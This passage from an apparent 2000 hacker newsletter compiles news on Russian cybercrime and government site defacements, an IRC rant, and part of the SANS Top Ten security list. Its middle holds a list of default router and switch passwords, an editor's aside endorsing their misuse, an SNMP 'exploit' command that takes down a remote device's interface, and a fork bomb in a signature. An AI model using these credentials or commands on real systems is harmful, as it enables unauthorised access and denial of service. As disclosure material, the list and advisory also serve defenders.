Alice's Restaurant of software. You can get anything you want. Moscow's Gorbushka market, featuring illegal copies of the latest software, is just one example of Russia's free-for-all computer culture. (AP) Laid out on tables under the trees of a Moscow park - as if at a huge yard sale - are row upon row of compact discs. The discs are crammed with pirated versions of expensive programs worth hundreds or thousands of dollars. Vendors offer everything from Microsoft's Windows 98 operating system to computer-assisted-design and voice-recognition software. Here, though, they're on sale for 75 rubles, or about $2.75, a disc. It's all illegal, but who's noticing? Russia's anarchic computer culture is fertile ground for hacking, piracy, credit-card fraud and other digital crime. Gorbushka, with its vendors hustling at makeshift tables, is just one of the more obvious examples. Russia has only about 1.5 million Internet users, a small number when compared with the estimated 110 million in the USA. But among them are some of the world's busiest digital vandals, pirates, thieves and spies. Their victims include the wealthy and powerful: Microsoft, whose software is widely pirated here, America Online, the Pentagon, Citibank. Police say the number of computer-related crimes continues to rise in Russia. More than 200 cases were reported in the first three months of this year - more than in all of 1999. Typical computer crimes include stealing credit card numbers sent to online businesses, software piracy, stealing passwords to get free time online and theft of business information. Some examples: Police arrested five suspected hackers accused of stealing credit-card numbers from Internet retailers and pocketing more than $630,000, the ITAR-Tass news agency reported last month. The group, which operated from December to April, stole numbers from more than 5,400 cards belonging mostly to foreigners, police said. Working with an insider, hackers bypassed the security system of the huge natural gas monopoly Gazprom last year and temporarily seized control of the system that regulates gas flows in pipelines, according to the Interior Ministry. Officials did not say whether the break-in caused any damage. A Russian hacker going by the name Maxus distributed more than 25,000 credit-card numbers stolen from an online store, CDUniverse.com. Most of the records were from accounts in the USA, where 65% of the company's customers live. Maxus tried to extort money from the company in January; he sent an e-mail in which he said he had breached the security of a popular credit-card processing program and stole 300,000 customer records. As far as the company knows, he was never caught. Hundreds of PIN codes giving access to credit- and debit-card accounts apparently were stolen in mid-1999 after a security breach at a Moscow card-processing center. Cardholders often had their checking accounts cleaned out in an unusual example of bulk PIN theft. America Online and Compuserve shut down local Internet access numbers in Moscow in 1997 because of what the company called "intolerable levels of fraud." In one of the world's first online theft cases to be prosecuted, Vladimir Levin of St. Petersburg was sentenced to three years in a U.S. prison for stealing $3.7 million from Citibank accounts in 1995 using a personal computer. He was arrested in Britain and extradited to the USA. Hackers apparently working from Russia rummaged in Department of Defense computers for more than a year and stole reams of information. No top-secret material was stolen, the Pentagon says. Computers at NASA and Energy Department nuclear weapons labs also were raided. Investigators don't know who was behind the attack, but some say they suspect Russian intelligence services. Related story: Hackers drawn by thrills, challenge, cash Russia's Foreign Intelligence Service has denied it. The agency says it would be too obvious to hack from inside Russia. Why does so much mischief emanate from Russia? The hacker problem begins in school, where hacking habits are rife, Russian computer professionals say. During Soviet times, the government and universities actually encouraged people to copy Western software. Sometimes lacking the printed data that come with store-bought software, people began taking programs apart to see how they worked. "People had to hack programs to learn them and adapt them to Soviet technical conditions," says Mikhail Salnikov, head of Compulog computer consultants and a veteran of the early days of personal computers in Russia. The Soviet government, by copying Western computer technology rather than developing its own versions, was the first hacker, Salnikov says. Combine that with Russia's high level of technical education and the result is a culture in which many people think copying software is no big deal. Those people also have the skills to steal passwords or defeat software security features designed to thwart copying. Maj. Dmitry Chepchugov, head of the Interior Ministry's elite anti-computer crime unit, says poverty plays a role, especially in password theft. "We have many people who need the Internet but don't have the money," he says. So they piggyback on someone else's access. Otherwise honest people, he says, see nothing wrong in illegal copies, especially when a legal copy can cost a month's wages. "It's only in the past four years that people have begun to see the theft of intellectual property as the same as the theft of real property," he says. "It's an intellectual - and a generational - problem." In hopes of wresting some of the bigger customers away from the Gorbushka, manufacturers conduct aggressive education campaigns about software compliance in Russia's corporate sector. However, education among Russian software users might not be enough to stop the threat Russian software thieves present. Macromedia, a San Francisco-based company that produces Web-design software, is not a major player in the Russian market. Still, it can't afford to ignore piracy here. Steve Wozniak, director of the company's anti-piracy programs, says Macromedia software has been sold over the Internet from Russia to customers in the West. Russians also have set up Web sites that give away "cracks" for Macromedia software - essentially providing the intellectual tools for would-be pirates. Russia rivals China for world leadership in software piracy; about 92% of business software running on Russian machines is estimated to be bootleg, according to the Business Software Alliance, a U.S.-based industry group. Recent estimates put the value of the stolen software at $273 million. That's not to say corporations aren't making any money in Russia. "By selling only to 8% of potential customers, Microsoft-Russia sales are about $25 million," says Eugene Danilov, Microsoft-Russia's marketing manager. "Imagine what additional revenue could be generated if piracy was reduced to 80%, 70%." Contributing: Sarah Karush @HWA 252.0 [TXT] Treatise: "Why EFnet Sucks." by: Anonoymous Whiner ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date unknown: sourced from Mixter's archives http://mixter.warrior2k.com. Brief history, prologue: EFnet is "Eris Free" net. In a nutshell a rogue system on a young IRC (Internet Relay Chat) network constantly caused problems for the other systems and anarchy in their midst, consequently they were de-linked (removed from network access) and banished to go form their own network. The offending system named "Eris" was now absent and it was conceded to call the new net "Eris Free" as they were now rid of the offending machine.,,, Brief rant by the Editor follows: IRC Basically came to life in 1989 with the coding of ircd so no more talkd hacks were needed for meetings, personally I believe EFnet is the place to be, but then I grew up here. It was the new frontier you posted your claim stakes then fought to keep your territories. Its a little different in the methodology today but the pyschology and dynamics are essentially the same. I refuse to give up on a good system simply because some strong willed oppionated individuals want to throw their inflated power fed ego's around causing chaos in our midst. Deal with the issues correct the wrongs and continue on. Don't just abandon ship and move on hoping the next one doesn't develop some of the SAME holes.... - my 2c (See article on EFnet owning later in this issue) :- Cruciphux Date: Unknown i'd say 1995-8 but could be wrong. And now, the file: ***************************************************************** Why EFnet sucks =============== * The four main reasons * The summary * The conclusion 1. Rules The policies of efnet are certainly hippocratic. The main goal of efnet was to provide a free network with a minimum of "laws" that ensure its stability. The main idea was to create a network where no channels, nicknames, or other virtual resources within irc are "owned" by anyone. One main statute was also that irc operators don't involve in channel and user matters, as long it is non relevant to an actual problem with an irc server. Look at efnet today, many opers abuse their powers, involve in senseless conflicts, take over channels and certain nicknames, sometimes in co-operation with takeover groups, and hire un-talented accomplices to find bots, spammers or "deal" with "abusers". 2. Routing and Administration The efnet team is incapable of agreeing on many, many things. They don't manage to use an uniform version of the ircd code, some servers never upgrade, others upgrade always without asking others, etc. This results in a chaotic ircd infrastructure, and some servers vulnerable to certain channel security problems, while others are not, or vulnerable to other problems. The efnet guidelines to get a link to the efnet backbone are also very un-efficient. While some powerful servers with high bandwidth are denied links because their link is declined in the act of voting, instead of following objective guidelines, other peoples servers who are already known to the efnet team because they're oper or anything are accepted even if they do not provide appropriate resources. IRC Operators tend to non-tolerated behavior (abuse, random klines) and many have lost their o-lines, while others, who have more "authority", can get away with almost everything. 3. Ircd development Both ircd servers, the version developed by the hybrid team, and the version developed by Chris Behrens are not coded with optimization and an increase of user functionality in mind, but instead more and more paranoid fixes and flood detection are applied to them, with the goal to give the opers more "power" over their network, and to automatically detect abuse without doing much. As mentioned before, the actual guidelines of efnet do originally permit many of the kinds of "abuse", like channel takeovers, running bots, etc. Nevertheless, the recent security features do actually cripple the functionality of the efnet network. Examples for hybrid5 / CS irc daemons: - opers can cycle channels without delay, they can set channel modes without delay, while normal users requests are delayed intentionally - opers can gain channel ops on netsplits, while it is almost impossible for users, resulting in increased attacking of the servers by takeover groups to cause them to split more frequently - users who do not send messages for a certain time are disconnected, forcing all efnet servers to have a policy against idling - joining a channel and parting it immediately, as well as channel CTCP requests, will alert every oper on the server telling them your private channel name, your nickname, and if a tcm (monitoring bot) is running, it will automatically suggest the server operators to k-line the user. because of cycling or ctcp'ing a channel. Examples for hybrid6 (will be the new standard): - The normal user can no longer request STATS information, and other such like versions from a remote irc server, disabling a user with a problem to get administrative info or a list of active operators from that server he could request help from. - Multiple targets for messaging and noticing are no longer supported. This breaks the RFC for IRC again, and it will force many users to re-write their scripts or even clients. - Ban exemption like on ircd 2.10 is now supported, with all its vulnerability. Many clients cannot recognize +e modes, and it can be used in channel take over, to make flooders/takers unable to be banned out of a channel until the mode is removed. If all this is not enough, there is conformed insider information, that four major efnet servers are currently running in debug mode, which enables them to see ALL private traffic, like private chat, passwords sent to channel protection bots, messages, etc. and the information is being filtered and sent to the FBI, which requested this. Currently, a big EDU server, an .ORG server, an European server, and a server of a major ISP which are all linked to efnet, are monitoring traffic via DEBUG MODE. 4. Channel takeover groups Takeover has always been present on efnet, and in the past it has not been a big threat to servers or users. However, the new wave of takeover people is using high-bandwidth attacks against servers and users, causing several damage to everyone, and threatening the major channels of efnet which are their primary target. One problem is, that "new school" takeover people actively compromise hundreds of random servers over the internet, with the single purpose to use the boxes with high bandwidth connectivity to attack irc servers and irc clients. Group members co-operate to gather their power against anyone, being a serious threat to anyone they decide to attack because of whatever reason. Also, there has been a big recent increase of shell services on the internet, who offer high-bandwidth access, like it had only been available to educational institutions and enterprises before, to everyone for prices as low as $5 per month. Today, everyone can afford this technology along with fancy long hostnames, that look like the hostnames used in spoofing attacks some years ago. But note, that these people are everything else than hackers. They have merely the knowledge on how to configure a bot or irc client and know 3-5 shell commands which they also use to attack from their compromised hosts and thats all. The problem is, that almost every teenager without a clue can nowadays get a shell, fancy hostname, which will eventually get him into a group with other people like him, who teach him the basic skills of compromising a server and running denial-of-service off it. Summary: As a normal user not willing to break into hosts or join a online rioting gang, you are helpless against takeovers, and the irc ops won't help you either. As an experienced user or hacker you are attacked by ircops because you are "abusive". You can join a 1337 takeover group if you can bear to deal with their lameness or stupidity... As a takeover kiddy you are in the gang of elite vhost ownerz and do pretty much what you want, while you attack servers with kinds of attack whose damage you probably cannot even evaluate. The size of your ego exceeds the size of your intellect and you have to play avoid-the k-line every day by carding new leet vhosts. If you are one of the dumbest sort of take kiddies you waste your additional free time with warez. You get what you want for the price of having neither a life or half a mind... As an irc operator or admin you are always involved in the hassle with other opers, who tell you what to do or what not, and if you get unpopular, your server will become a target for takeover d00ds. You can start becoming mr. evil mass k-liner which will undoubtly escalate the "war", and you might succeed to ban the takers and "abuse" with extreme aggression, against takers and probably innoccent people as well, from your server to another one, and/or worse, get in more dumb hassle with the ircop "community", maybe your o-line removed or your server delinked. Conclusion: Leave EFnet. Greets to Monk aka Monkster aka Monkiespankr how do you like this one. @HWA 253.0 [HWA] Honeypots: who's fooling who? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ July 2000 By Cruciphux First of all, what is a honeypot?, A honeypot is a phrase coined to describe a system that is either inentionally weak in security or is placed outside a company's firewall to distract would be crackers or attackers from the real valuable content 'protected' concealed within. This practice has been the source of much debate since its inception and use by several companies and security outfits on the net, it should be noted that honeypots are not the exclusive domain of the good guys ('white hats') currently employing this tactic. @HWA 254.0 [IND] Hacking Away At Government ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 2 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_060200a_j.shtml 6/2/00 Hacking Away At Government By Christopher Swope, Governing Magazine, June 2000 HIGHLIGHT: In the race to get online, network security has been something of an afterthought. But even the most obscure agency can be a target for Internet intruders. BODY: "Fresno Means Business" is the first thing you see when you visit the California city's Web page, and to emphasize the point, there is a collage of pictures showing the downtown skyline and business people working. The message, the collage says in so many words, is "Development and Economic Vitality." So you can imagine city officials' displeasure one day last November when the skyline and business people were suddenly gone, replaced with a different message: "Hacked by globher." It wasn't the first time Fresno's site had been hacked. Three weeks earlier, another intruder had taken down the site and replaced it with boastful gibberish and profanity. Fortunately, during both incidents, no major damage was done, and each time the city's Web team had the site cleaned up in less than an hour. "We thought we were covered, but they knew the tricks to get into the server," says Allen Smith, Fresno's webmaster. "If we had kept up with Microsoft's security alerts, we would have been OK." If officials in Fresno are a bit embarrassed by these incidents, they have plenty of company. According to records on Web site defacements kept by attrition.org, a hacking watchdog, more than five dozen state and local governments or agencies were attacked in the six months between November and April. The day after the second hit on Fresno, for example, a hacker who goes by the name "YTCracker" attacked one of the less likely targets in the state of New York: the Department of Agriculture and Markets. Again, no serious harm was done, although it also must have left some in the department blushing. Among other things, the hacker scrawled the quote "YTCracker is cool" under a picture of Governor George Pataki. "The whole episode really woke us up to the possibility that even we can get hacked," says Peter Gregg, a department spokesman. "We figured, who'd want to hack us?" By now, most state and local governments have staked out a presence on the Internet, but in the race to get online, network security has been something of an afterthought. What they're starting to find--some of them the hard way--is that anyone on the Internet, even the most obscure government agency, is a target for computer hackers. "It's really a matter of when, not if, you'll be attacked," says Mark Zajicek a computer security expert with the CERT Coordination Center at Carnegie Mellon University. "Once you connect to the Internet, the rest of the Internet is connected to you." Fresno, like most places that have been hit by hackers so far, was lucky: The site contained only such static information as press releases, job listings and city phone numbers. This time around, the hacker attacks amounted to little more than digital graffiti. The damage, in fact, was probably easier to remove than spray paint from a wall. In the era of digital government, however, network security will only increase in importance and complexity. Fresno, like nearly every state, city and county, is looking into delivering services online, from tax collection to issuing permits. It is an exciting development, but the flip side is that each new service opens a channel into government computer networks for hackers to exploit. Web-enabled government not only exposes a new Achilles heel to malicious hackers but also elevates the battle against them to a new level. To hackers, a digital government is simply a juicier target. There is more havoc to wreak by breaking in, and more notoriety to be gained. To state and local governments, credibility is on the line: The success or failure of their Web ventures will hinge on citizens' faith in their security to use them. "Every time a state or local government moves a new process into the cyber-domain, it raises vulnerability," says Steven Trevino, an executive with Infrastructure Defense Inc., a network security firm that is working with Public Technology Inc. to assess the security needs of local governments. "It's a risk-management proposition they've never had to deal with." SNIFFING OUT HACKERS The war on hackers, quite expectedly, has spawned a booming market for security software and hardware. State and local governments are installing firewalls to separate data on internal systems from what goes up on the Web. Soon after being hacked, the New York agriculture department stocked up on intrusion-detection software that can sniff out a hacker's moves before any damage is done. The scary thing, however, is that even vendors who sell the stuff admit that no amount of network protection could keep out the smartest, most dedicated hackers. Of course, one doesn't even need to be a computer geek to be a hacker these days. Anyone can learn the basics by visiting a number of Web sites that essentially teach "hacking for dummies" lessons. Even a lot of the technical work of hacking has been automated, in programs that can be downloaded off the Internet for free. In many ways, network security is a cat-and-mouse game. Nearly every piece of technology running the Internet today has a bug in it somewhere for hackers to exploit. Companies such as Microsoft are continually issuing security warnings about holes in their software, and offering "patches" that fix the problem. Of course, the bad guys pay attention to these warnings too, and use them as a road map for breaking into systems that haven't been updated. "Just buying the latest commercial products may give you a false sense of security," says Zajicek. "Unless you're continually upgrading, it's just a race between your product and the latest attack methods." While spending money on upgrading software and hardware can certainly help, that is the easy part, security experts say. The hard part is cultivating a management culture that recognizes the importance of security and the urgency of addressing security issues quickly. The political need to get more information and new services online as fast as possible often trumps the practical need to have a well-fortified site. Moreover, many state and local IT departments are chronically understaffed, already tugged in a hundred different directions. The lesson, management-wise, from a recent security incident in the city of Sunnyvale, California, is that it pays to be proactive. Back in February, at the same time that popular Web sites such as Yahoo!, eBay and CNN.com were being shut down by so-called "distributed denial of service" attacks, Sunnyvale's IT managers noticed that something funny was happening to their site, too. Traffic suddenly shot up six-fold, and engineers determined that much of the increased traffic was coming from one particular address in Virginia. They immediately took measures to block hits from that address, and the problem went away. Sunnyvale Chief Information Officer Shawn Hernandez says he's still not sure whether the incident was related to the attacks on Yahoo! and the others. And unlike those attacks, the increased traffic on Sunnyvale's site never peaked high enough to shut it down. That's all the more reason to take a proactive stance. "You have to constantly monitor your network, be familiar with the level of traffic expected, and zero in on that when it fluctuates," Hernandez says. "When you see abnormal situations, you need to investigate and jump on it immediately." HIRING WHITE HATS In that vein, security experts say that every government on the Web should be aware of what its security weaknesses are. Some have taken to hiring ethical hackers, or "white hats," who break into their systems in order to assess what holes exist. Ideally, governments should patch those holes up, or at bare minimum, monitor them closely, and should have a plan for dealing with hacker attacks when they do, inevitably, happen. Unfortunately, it is often not until a security breach occurs that a more comprehensive security plan takes shape. By then, of course, it is too late--although not too late to keep it from happening again. It took just 13 minutes last March for a hacker to break into the Web page of the Oklahoma Department of Libraries. But it took six days for the department to get the site back up. In the wake of the incident, Web development officer Michael O'Hasson performed an extensive security assessment and shared lessons from the episode at a state Web managers' meeting. The lessons read like a self-help pamphlet for techies. "Do not think that obscurity will save you," says one. "Never assume that prior security patches were done before," reads another. The other points make clear the need to have contingency plans in place, such as having a "summer home" for a Web site, an alternate place to host the site in case of emergency. In the meantime, the Oklahoma Department of Libraries--like Fresno and a lot of other state and local agencies that thought they were safe--can take comfort in the fact that this round with the hackers has really been something of an exhibition match. It's the next round, with confidential taxpayer data and credit-card numbers at stake, when the score will really count. "The break-in right now is actually good for us," says Allen Smith, the Fresno webmaster. "We don't have that stuff out there now, but we're planning on it. Actually, it's good timing, because it made us more aware of what we need to look at." @HWA 255.0 [IND] The DEPL and other Default password lists ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Compiled by Cruci. (May/Updated/Nov 2000) Scarfed from the VULNDEV full disclosure security mailing list (Security Focus), PacketStorm and other sources. http://www.phenoelit.de/dpl/dpl.html http://packetstorm.securify.com/docs/hack/defaultpasswords.txt Double edged swords.... use in an ethical manner... unless you REALLY must fuck someone over and they like deserve it or some shit. - Ed :-o $Id: dpl.html,v 1.5 2000/07/13 06:06:39 lists Exp lists $ { Included in archive. } If you did not recieve the DEPL in your archive complain to your distributor sorry, no refunds, no exchanges. Suplimentary Listing: Default usernames and passwords for Routers/Switches/Hubs and others thingies Type/vendor/notes/etc Username Password 3Com admin synnet 3Com read synnet 3Com write synnet 3Com monitor monitor 3Com manager manager 3Com security security 3Com_Office_Connect_5x0_ISDN_Routers n/a PASSWORD 3comCellPlex7000 tech tech 3comCoreBuilder7000/6000/3500/2500 debug synnet 3comCoreBuilder7000/6000/3500/2500 tech tech 3comHiPerARCv4.1.x adm 3ComLANplex2500 debug synnet 3ComLANplex2500 tech tech 3comLinkSwitch2000/2700 tech tech 3comSuperStackIISwitch 2200 debug 3comSuperStackIISwitch 2700 tech ACC(Ericsson) netman netman ADC_Kentrox_Pacesetter_Router n/a secret All_Zyxel_equipment n/a 1234 AT&T_3B2_firmware n/a mcp AXIS200/240[netcam] root pass Bay_routers Manager Bay_routers User Bay350T_Switch n/a NetICs BaySuperstackII security security BRASX/I01_(DataCom) n/a letmein BreezeCOM_adapters2.x(console_only) n/a laflaf BreezeCOM_adapters3.x(console_only) n/a Master BreezeCOM_adapters4.x(console_only) n/a Super Cayman_DSL n/a Crystalview_outsideview32 n/a crystal digiCorp_(viper?) n/a BRIDGE digiCorp_(viper?) n/a password DLink_hub/switches D-Link D-Link Flowpoint_DSL_installed_by_Covad n/a password Flowpoint_DSL2000 admin admin Jetform_design Jetform n/a Lantronics_Terminal_server_port 7000 n/a Lantronics_Terminal_server_port 7000 n/a Linksys_DSL n/a admin Livingston_IRX_router !root Livingston_officerouter !root Livingston_portmaster2/3 !root Microplex_print_server root root Motorola-Cablerouter cablecom router Netopia_7100 Netopia_9500 netopia netopia Orbitor_console n/a password Orbitor_console n/a BRIDGE Osicom(Datacom) sysadm sysadm Shiva root Shiva Guest SpeedstreamDSL(Efficient) n/a admin UClinux_for_UCsimm root uClinux Webramp wradmin trancell Alteon ACEswitch 180e (web) admin admin Alteon ACEswitch 180e (telnet) admin NETPrint (all) n/a sysadm Xylan Omniswitch admin switch Xylan Omniswitch diag switch AcceleratedDSL CPE and DSLAM sysadm anicust Arrowpoint admin system Cabletron (routers & switches) Needed Packeteer Cabletron SMC Accton Contributed by: Stephen Friedl Sebastian Andersson Jonathan Leto mat@ivntech.com Mike Blomgren Knud Erik Hřjgaard mobileunit@mobileunit.org Roelof Temmingh Axel Dunkel Mathias Bogaert" extracts from "Hacking Exposed" Jonathan Leto Chris Owen Jim Wildman Santiago Zapata Brian S. DuRoss Eric Knight Max Vision vision@whitehats.com Lou Albano mistert@dslnet.com Last Updated on Fri Jul 7 02:14:22 SAST 2000 By Roelof Temmingh Email: roelof@sensepost.com World writeable SNMP communities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Days ago, there was a discussion about world-readable snmp communities, some people thought it was bad enough. Amazingly, I've found that a lot of network devices (such as intelligent switches, WAN/LAN routers, ISDN/DSL modems, remote access machines and even some user-end operating systems) are by default configured with snmp enabled and unlimited access with *write* privledges. It allows attacker to modify routing tables, status of network interfaces and other vital system data, and seems to be extermely dangerous. To make things even worse, some devices seems to tell that write permission for given community is disabled, but you can still successfully write to it - and other devices won't let you to set up snmp access at all (eg. some modems and switches). Here's brief list of devices I've found with world-writable communities - and names of these communities, respectively: - 3com Switch 3300 (3Com SuperStack II) - private - Cray MatchBox router (MR-1110 MatchBox Router/FR 2.01) - private - 3com RAS (HiPer Access Router Card) - public - Prestige 128 / 128 Plus - public - COLTSOHO 2.00.21 - private - PRT BRI ISDN router - public - CrossCom XL 2 - private - WaiLAN Agate 700/800 - public - HPJ3245A HP Switch 800T - public - ES-2810 FORE ES-2810, Version 2.20 - public - Windows NT Version 4.0 - public - Windows 98 (not 95) - public - Sun/SPARC Ultra 10 (Ultra-5_10) - private This list is for sure uncomplete, and might be inaccurate - it has been created after extensive, but only remote tests on devices outside my network (usually, these machines are inside ISP networks). On following devices, some parameters can be changed, but some can't - so it seems to be less dangerous: - HP LaserJet (EEPROM G.08.03) - public - PICO router - public - Xyplex Router 6.1.1 - private Best solutions: - try to disable unlimited snmp access, if possible, then check if it really worked, - ask vendor for firmware upgrade, - do not route traffic addressed to snmp-enabled devices from outside. Other systems: Cisco and Motorola routers, Netware, most Unix boxes are not vulnerable. Exploit code: $ snmpset hostname {private|public} interfaces.ifTable.ifEntry.ifAdminStatus.1 i 2 ...should bring 1st network interface on remote machine down... for more interesting options to be set, execute: $ snmpwalk hostname {private|public} _______________________________________________________ Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM] [dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl] [+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----= @HWA 256.0 [IND] Security Firm To List Additional Hacking Threats ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 2 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_060200b_j.shtml 6/2/00 Security Firm To List Additional Hacking Threats By David McGuire, Newsbytes WASHINGTON, D.C., U.S.A., 02 Jun 2000, 4:49 PM CST While Thursday's unveiling of the 10 most dire Internet security threats has already generated widespread discussion in the technology community, one cyber-security firm is warning against taking the list at face value. Published Thursday by the not-for-profit SANS (System Administration, Networking and Security) Institute, the highly technical "Ten Most Critical Internet Security Threats" list is a valuable document, but should not be seen as the end-all and be-all of security concerns, Network Security Technologies (NETSEC) Vice President Joseph Nowland said today. The threats listed in the document are just the "tip on the iceberg," Nowland said, warning network administrators not to feel safe simply because they address the 10 concerns outlined by SANS. NETSEC intends next week to release its own supplemented list of Internet security threats identified by its in-house team of hackers, Nowland said. SANS leaders agree that the list of security threats, which reads like Egyptian hieroglyph to the technologically uninitiated, is just a stepping off point for addressing security concerns. "All we've done so far is define the problem," Stephen Northcutt, the director of SANS' Global Incident Analysis Center, told Newsbytes on Thursday. "The next step is to create a step-by-step repair (protocol) for every single operating system on the face of the planet." Nowland said that NETSEC security experts became concerned when they say news reports that seemed to indicate that the SANS document was somehow a comprehensive list of cyber-threats. Organizations that simply fix those problems and think they are safe would be in for a serious shock, Nowland said. NETSEC's list of additional security threats will include holes not outlined in the SANS list, he added. While the SANS Top 10 list, which is posted on the SANS Web site at http://www.sans.org/topten.htm , contains links to patches for some of the threats it enumerates, Northcutt said Thursday that a broader solution will be much longer in coming. NETSEC's Web site is located at http://www.netsec.net . @HWA 257.0 [IND] SANS: Top 10 hacker targets ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Follow-up from previous article July 11 2000 http://www.infowar.com/hacker/00/hack_060200b_j.shtml How To Eliminate The Ten Most Critical Internet Security Threats The Experts’ Consensus Version 1.24 July 11, 2000 Copyright 2000, The SANS Institute Log of updates v. 1.24 - 07/11/00 Section added naming people who have helped improve this document through their contributions v. 1.23 - 07/11/00 Section 2 CVE List revised and updated v. 1.22 - 06/19/00 Signatories updated v. 1.21 - 06/16/00 Signatories corrected v. 1.20 - 06/15/00 # 11 in "Perimeter Protection For An Added Layer of Defense In Depth" section updated v. 1.19 - 06/12/00 Correction - Section 8E moved to 7E. v. 1.18 - 06/08/00 Updated section 8E and F by adding diagnostic and correction utility. v. 1.17 - 06/08/00 Sections 4A and 4B updated v. 1.16 - 06/08/00 # 11 in "Perimeter Protection For An Added Layer of Defense In Depth" section updated v. 1.15 - 06/06/00 Signatories corrected v. 1.14 - 06/04/00 Signatories corrected v. 1.13 - 06/02/00 Section 5A and 5B updated, 5C removed v. 1.12 - 06/02/00 Section 7E updated v. 1.11 - 06/02/00 Sections 3B & 6B SGI Software Patches updated > Download this document in MS Word format > Download this document in .rtf (Rich Text) format SANS Educational Programs SANS Parliament Hill 2000 August 21-24, 2000 Network Security 2000 October 15-22, 2000 Stop the Break-Ins! The majority of successful attacks on computer systems via the Internet can be traced to exploitation of one of a small number of security flaws. Most of the systems compromised in the Solar Sunrise Pentagon hacking incident were attacked through a single vulnerability. A related flaw was exploited to break into many of the computers later used in massive distributed denial of service attacks. Recent compromises of Windows NT-based web servers are typically traced to entry via a well-known vulnerability. Another vulnerability is widely thought to be the means used to compromise more than 30,000 Linux systems. A few software vulnerabilities account for the majority of successful attacks because attackers are opportunistic – taking the easiest and most convenient route. They exploit the best-known flaws with the most effective and widely available attack tools. They count on organizations not fixing the problems, and they often attack indiscriminately, by scanning the Internet for vulnerable systems. System administrators report that they have not corrected these flaws because they simply do not know which of over 500 potential problems are the ones that are most dangerous, and they are too busy to correct them all. The information security community is meeting this problem head on by identifying the most critical Internet security problem areas – the clusters of vulnerabilities that system administrators need to eliminate immediately. This consensus Top Ten list represents an unprecedented example of active cooperation among industry, government, and academia. The participants came together from the most security-conscious federal agencies, from the leading security software vendors and consulting firms, from the top university-based security programs, and from CERT/CC and the SANS Institute. A complete list of participants may be found at the end of this article. Here is the experts’ list of the Ten Most Often Exploited Internet Security Flaws along with the actions needed to rid your systems of these vulnerabilities. Three Notes For Readers: Note 1. This is a living document. It includes initial, step-by-step instructions and pointers for correcting the flaws. We will update these instructions as more current or convenient methods are identified and we welcome your input. This is a community consensus document – your experience in eliminating the vulnerabilities can help others who come after you. To make suggestions e-mail info@sans.org with the subject Top Ten Comments. To get the latest version of the guidelines, e-mail info@sans.org with the subject Top Ten Fixes. Note 2. You’ll find references to CVE numbers – the Common Vulnerabilities and Exposures reference numbers that correspond with vulnerabilities. CAN numbers are candidates for CVE entries that are not yet fully verified. For more data on the award-winning CVE project, see http://cve.mitre.org. Note 3. At the end of the list, you’ll find an extra section offering a list of the ports used by commonly probed and attacked services. By blocking traffic to those ports at the firewall or other network perimeter protection device, you add an extra layer of defense that helps protect you from configuration mistakes. 1. BIND weaknesses: nxt, qinv and in.named allow immediate root compromise. The Berkeley Internet Name Domain (BIND) package is the most widely used implementation of Domain Name Service (DNS) -- the critical means by which we all locate systems on the Internet by name (e.g., www.sans.org) without having to know specific IP addresses -- and this makes it a favorite target for attack. Sadly, according to a mid-1999 survey, about 50% of all DNS servers connected to the Internet are running vulnerable versions of BIND. In a typical example of a BIND attack, intruders erased the system logs, and installed tools to gain administrative access. They then compiled and installed IRC utilities and network scanning tools, which they used to scan more than a dozen class-B networks in search of additional systems running vulnerable versions of BIND. In a matter of minutes, they had used the compromised system to attack hundreds of remote systems abroad, resulting in many additional successful compromises. This illustrates the chaos that can result from a single vulnerability in the software for ubiquitous Internet services such as DNS. Systems Affected: Multiple UNIX and Linux systems As of May 22, 2000, any version earlier than BIND v.8.2.2 patch level 5 is vulnerable. CVE Entries: nxt CVE-1999-0833 qinv CVE-1999-0009 Other related entries: CVE-1999-0835, CVE-1999-0848, CVE-1999-0849, CVE-1999-0851 Advice on correcting the problem: A. Disable the BIND name daemon (named) on all systems that are not authorized to be DNS servers. Some experts recommend you also remove the DNS software. B. On machines that are authorized DNS servers, update to the latest version and patch level (as of May 22, 2000, latest version was 8.2.2 patch level 5) Use the guidance contained in the following advisories: For the NXT vulnerability: http://www.cert.org/advisories/CA-99-14-bind.html For the QINV (Inverse Query) and NAMED vulnerabilities: http://www.cert.org/advisories/CA-98.05.bind_problems.html http://www.cert.org/summaries/CS-98.04.html C. Run BIND as a non-privileged user for protection in the event of future remote-compromise attacks. (However, only processes running as root can be configured to use ports below 1024 a requirement for DNS. Therefore you must configure BIND to change the user-id after binding to the port.) D. Run BIND in a chroot()ed directory structure for protection in the event of future remote- compromise attacks. 2. Vulnerable CGI programs and application extensions (e.g., ColdFusion) installed on web servers. Most web servers support Common Gateway Interface (CGI) programs to provide interactivity in web pages, such as data collection and verification. Many web servers come with sample CGI programs installed by default. Unfortunately, many CGI programmers fail to consider ways in which their programs may be misused or subverted to execute malicious commands. Vulnerable CGI programs present a particularly attractive target to intruders because they are relatively easy to locate, and they operate with the privileges and power of the web server software itself. Intruders are known to have exploited vulnerable CGI programs to vandalize web pages, steal credit card information, and set up back doors to enable future intrusions, even if the CGI programs are secured. When Janet Reno's picture was replaced by that of Adolph Hitler at the Department of Justice web site, an in-depth assessment concluded that a CGI hole was the most probable avenue of compromise. Allaire's ColdFusion is a web server application package which includes vulnerable sample programs when installed. As a general rule, sample programs should always be removed from production systems. Systems Affected: All web servers. CVE Entries: ** Sample CGI programs (All CGI) Remedy: Remove all sample CGI programs on a production server. ** CAN-1999-0736(IIS 4.0, Microsoft Site Server 3.0, which is included with Microsoft Site Server 3.0 Commerce Edition, Microsoft Commercial Internet System 2.0, and Microsoft BackOffice Server 4.0 and 4.5) (see http://www.microsoft.com/technet/security/bulletin/ms99-013.asp ) Remedy: Apply patch at : ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/ CVE-1999-0067 (phf phone book program included with older NCSA and 